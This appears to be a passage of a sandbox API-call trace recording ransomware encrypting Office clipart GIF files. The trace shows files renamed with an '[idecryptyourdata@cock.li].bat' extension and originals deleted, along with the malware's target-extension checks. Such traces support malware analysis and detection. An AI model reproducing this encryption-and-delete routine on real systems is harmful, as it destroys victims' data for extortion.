CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00142_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00142_.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0061.058] GetLastError () returned 0x0 [0061.058] ReadFile (in: hFile=0x368, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x3bcc, lpOverlapped=0x0) returned 1 [0061.385] WriteFile (in: hFile=0x344, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0x3bd0, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0x3bd0, lpOverlapped=0x0) returned 1 [0061.386] ReadFile (in: hFile=0x368, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x0, lpOverlapped=0x0) returned 1 [0061.386] WriteFile (in: hFile=0x344, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xec, lpOverlapped=0x0) returned 1 [0061.386] SetEndOfFile (hFile=0x344) returned 1 [0061.386] CloseHandle (hObject=0x344) returned 1 [0061.388] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0061.388] SetEndOfFile (hFile=0x368) returned 1 [0061.389] CloseHandle (hObject=0x368) returned 1 [0061.389] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00142_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0061.390] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00142_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00142_.gif")) returned 1 [0061.390] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00142_.GIF") returned 68 [0061.390] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00142_.GIF") returned 68 [0061.390] lstrlenW (lpString=".doc") returned 4 [0061.390] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0061.390] lstrlenW (lpString=".docx") returned 5 [0061.390] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0061.390] lstrlenW (lpString=".pdf") returned 4 [0061.390] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0061.390] lstrlenW (lpString=".xls") returned 4 [0061.390] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0061.390] lstrlenW (lpString=".xlsx") returned 5 [0061.390] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0061.390] lstrlenW (lpString=".ppt") returned 4 [0061.390] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0061.390] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00142_.GIF") returned 68 [0061.390] lstrlenW (lpString=".zip") returned 4 [0061.390] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0061.390] lstrlenW (lpString=".rar") returned 4 [0061.390] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0061.391] lstrlenW (lpString=".bz2") returned 4 [0061.391] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0061.391] lstrlenW (lpString=".7z") returned 3 [0061.391] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0061.391] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00142_.GIF") returned 68 [0061.391] lstrlenW (lpString=".dbf") returned 4 [0061.391] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0061.391] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00142_.GIF") returned 68 [0061.391] lstrlenW (lpString=".1cd") returned 4 [0061.391] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0061.391] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00142_.GIF") returned 68 [0061.391] lstrlenW (lpString=".jpg") returned 4 [0061.391] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0061.391] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00142_.GIF") returned 68 [0061.391] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00142_.GIF") returned 68 [0061.391] lstrlenW (lpString=".doc") returned 4 [0061.391] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0061.391] lstrlenW (lpString=".docx") returned 5 [0061.391] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0061.391] lstrlenW (lpString=".pdf") returned 4 [0061.391] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0061.391] lstrlenW (lpString=".xls") returned 4 [0061.391] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0061.391] lstrlenW (lpString=".xlsx") returned 5 [0061.391] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0061.391] lstrlenW (lpString=".ppt") returned 4 [0061.391] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0061.392] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00142_.GIF") returned 68 [0061.392] lstrlenW (lpString=".zip") returned 4 [0061.392] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0061.392] lstrlenW (lpString=".rar") returned 4 [0061.392] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0061.392] lstrlenW (lpString=".bz2") returned 4 [0061.392] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0061.392] lstrlenW (lpString=".7z") returned 3 [0061.392] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0061.392] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00142_.GIF") returned 68 [0061.392] lstrlenW (lpString=".dbf") returned 4 [0061.392] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0061.392] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00142_.GIF") returned 68 [0061.392] lstrlenW (lpString=".1cd") returned 4 [0061.392] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0061.392] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00142_.GIF") returned 68 [0061.392] lstrlenW (lpString=".jpg") returned 4 [0061.392] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0061.392] lstrcmpiW (lpString1=".GIF", lpString2=".bat") returned 1 [0061.392] lstrlenW (lpString="AG00157_.GIF") returned 12 [0061.392] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00157_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00157_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0061.451] GetFileSizeEx (in: hFile=0x358, lpFileSize=0x268ff14 | out: lpFileSize=0x268ff14*=4955) returned 1 [0061.452] CloseHandle (hObject=0x358) returned 1 [0061.452] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00157_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00157_.gif")) returned 0x220 [0061.452] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00157_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00157_.gif.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0061.452] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00157_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00157_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0061.452] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0061.452] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0061.452] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00157_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00157_.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x370 [0061.453] GetLastError () returned 0x0 [0061.453] ReadFile (in: hFile=0x358, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x135b, lpOverlapped=0x0) returned 1 [0061.483] WriteFile (in: hFile=0x370, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0x1360, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0x1360, lpOverlapped=0x0) returned 1 [0061.484] ReadFile (in: hFile=0x358, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x0, lpOverlapped=0x0) returned 1 [0061.484] WriteFile (in: hFile=0x370, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xec, lpOverlapped=0x0) returned 1 [0061.485] SetEndOfFile (hFile=0x370) returned 1 [0061.485] CloseHandle (hObject=0x370) returned 1 [0061.485] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0061.485] SetEndOfFile (hFile=0x358) returned 1 [0061.486] CloseHandle (hObject=0x358) returned 1 [0061.486] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00157_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0061.487] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00157_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00157_.gif")) returned 1 [0061.487] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00157_.GIF") returned 68 [0061.487] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00157_.GIF") returned 68 [0061.487] lstrlenW (lpString=".doc") returned 4 [0061.487] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0061.487] lstrlenW (lpString=".docx") returned 5 [0061.487] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0061.487] lstrlenW (lpString=".pdf") returned 4 [0061.487] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0061.487] lstrlenW (lpString=".xls") returned 4 [0061.487] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0061.487] lstrlenW (lpString=".xlsx") returned 5 [0061.487] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0061.487] lstrlenW (lpString=".ppt") returned 4 [0061.489] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0061.489] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00157_.GIF") returned 68 [0061.489] lstrlenW (lpString=".zip") returned 4 [0061.489] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0061.489] lstrlenW (lpString=".rar") returned 4 [0061.489] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0061.489] lstrlenW (lpString=".bz2") returned 4 [0061.489] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0061.489] lstrlenW (lpString=".7z") returned 3 [0061.489] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0061.489] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00157_.GIF") returned 68 [0061.489] lstrlenW (lpString=".dbf") returned 4 [0061.489] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0061.489] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00157_.GIF") returned 68 [0061.489] lstrlenW (lpString=".1cd") returned 4 [0061.489] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0061.490] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00157_.GIF") returned 68 [0061.490] lstrlenW (lpString=".jpg") returned 4 [0061.490] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0061.490] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00157_.GIF") returned 68 [0061.490] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00157_.GIF") returned 68 [0061.490] lstrlenW (lpString=".doc") returned 4 [0061.490] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0061.490] lstrlenW (lpString=".docx") returned 5 [0061.490] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0061.490] lstrlenW (lpString=".pdf") returned 4 [0061.490] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0061.490] lstrlenW (lpString=".xls") returned 4 [0061.490] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0061.490] lstrlenW (lpString=".xlsx") returned 5 [0061.490] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0061.490] lstrlenW (lpString=".ppt") returned 4 [0061.490] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0061.490] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00157_.GIF") returned 68 [0061.490] lstrlenW (lpString=".zip") returned 4 [0061.490] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0061.490] lstrlenW (lpString=".rar") returned 4 [0061.490] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0061.490] lstrlenW (lpString=".bz2") returned 4 [0061.490] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0061.490] lstrlenW (lpString=".7z") returned 3 [0061.490] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0061.490] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00157_.GIF") returned 68 [0061.490] lstrlenW (lpString=".dbf") returned 4 [0061.491] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0061.491] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00157_.GIF") returned 68 [0061.491] lstrlenW (lpString=".1cd") returned 4 [0061.491] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0061.491] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00157_.GIF") returned 68 [0061.491] lstrlenW (lpString=".jpg") returned 4 [0061.491] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0061.491] lstrcmpiW (lpString1=".GIF", lpString2=".bat") returned 1 [0061.491] lstrlenW (lpString="AG00164_.GIF") returned 12 [0061.491] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00164_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00164_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0061.491] GetFileSizeEx (in: hFile=0x358, lpFileSize=0x268ff14 | out: lpFileSize=0x268ff14*=13254) returned 1 [0061.491] CloseHandle (hObject=0x358) returned 1 [0061.491] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00164_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00164_.gif")) returned 0x220 [0061.491] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00164_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00164_.gif.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0061.492] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00164_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00164_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0061.492] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0061.492] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0061.492] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00164_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00164_.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x370 [0061.492] GetLastError () returned 0x0 [0061.492] ReadFile (in: hFile=0x358, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x33c6, lpOverlapped=0x0) returned 1 [0061.581] WriteFile (in: hFile=0x370, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0x33d0, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0x33d0, lpOverlapped=0x0) returned 1 [0061.582] ReadFile (in: hFile=0x358, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x0, lpOverlapped=0x0) returned 1 [0061.582] WriteFile (in: hFile=0x370, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xec, lpOverlapped=0x0) returned 1 [0061.582] SetEndOfFile (hFile=0x370) returned 1 [0061.583] CloseHandle (hObject=0x370) returned 1 [0061.585] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0061.585] SetEndOfFile (hFile=0x358) returned 1 [0061.586] CloseHandle (hObject=0x358) returned 1 [0061.586] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00164_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0061.587] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00164_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00164_.gif")) returned 1 [0061.587] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00164_.GIF") returned 68 [0061.587] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00164_.GIF") returned 68 [0061.587] lstrlenW (lpString=".doc") returned 4 [0061.587] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0061.587] lstrlenW (lpString=".docx") returned 5 [0061.587] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0061.587] lstrlenW (lpString=".pdf") returned 4 [0061.587] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0061.587] lstrlenW (lpString=".xls") returned 4 [0061.587] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0061.587] lstrlenW (lpString=".xlsx") returned 5 [0061.587] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0061.587] lstrlenW (lpString=".ppt") returned 4 [0061.588] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0061.588] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00164_.GIF") returned 68 [0061.588] lstrlenW (lpString=".zip") returned 4 [0061.588] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0061.588] lstrlenW (lpString=".rar") returned 4 [0061.588] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0061.588] lstrlenW (lpString=".bz2") returned 4 [0061.588] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0061.588] lstrlenW (lpString=".7z") returned 3 [0061.588] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0061.588] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00164_.GIF") returned 68 [0061.588] lstrlenW (lpString=".dbf") returned 4 [0061.588] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0061.588] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00164_.GIF") returned 68 [0061.588] lstrlenW (lpString=".1cd") returned 4 [0061.588] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0061.588] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00164_.GIF") returned 68 [0061.588] lstrlenW (lpString=".jpg") returned 4 [0061.588] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0061.588] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00164_.GIF") returned 68 [0061.588] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00164_.GIF") returned 68 [0061.588] lstrlenW (lpString=".doc") returned 4 [0061.588] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0061.588] lstrlenW (lpString=".docx") returned 5 [0061.588] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0061.588] lstrlenW (lpString=".pdf") returned 4 [0061.588] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0061.589] lstrlenW (lpString=".xls") returned 4 [0061.589] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0061.589] lstrlenW (lpString=".xlsx") returned 5 [0061.589] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0061.589] lstrlenW (lpString=".ppt") returned 4 [0061.589] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0061.589] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00164_.GIF") returned 68 [0061.589] lstrlenW (lpString=".zip") returned 4 [0061.589] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0061.589] lstrlenW (lpString=".rar") returned 4 [0061.589] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0061.589] lstrlenW (lpString=".bz2") returned 4 [0061.589] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0061.589] lstrlenW (lpString=".7z") returned 3 [0061.589] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0061.589] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00164_.GIF") returned 68 [0061.589] lstrlenW (lpString=".dbf") returned 4 [0061.589] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0061.589] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00164_.GIF") returned 68 [0061.589] lstrlenW (lpString=".1cd") returned 4 [0061.589] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0061.589] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00164_.GIF") returned 68 [0061.589] lstrlenW (lpString=".jpg") returned 4 [0061.589] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0061.589] lstrcmpiW (lpString1=".GIF", lpString2=".bat") returned 1 [0061.590] lstrlenW (lpString="AG00169_.GIF") returned 12 [0061.590] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00169_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00169_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350 [0061.602] GetFileSizeEx (in: hFile=0x350, lpFileSize=0x268ff14 | out: lpFileSize=0x268ff14*=5375) returned 1 [0061.602] CloseHandle (hObject=0x350) returned 1 [0061.602] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00169_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00169_.gif")) returned 0x220 [0061.602] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00169_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00169_.gif.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0061.603] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00169_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00169_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350 [0061.603] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0061.603] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0061.603] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00169_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00169_.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0061.607] GetLastError () returned 0x0 [0061.607] ReadFile (in: hFile=0x350, lpBuffer=0x413b020, 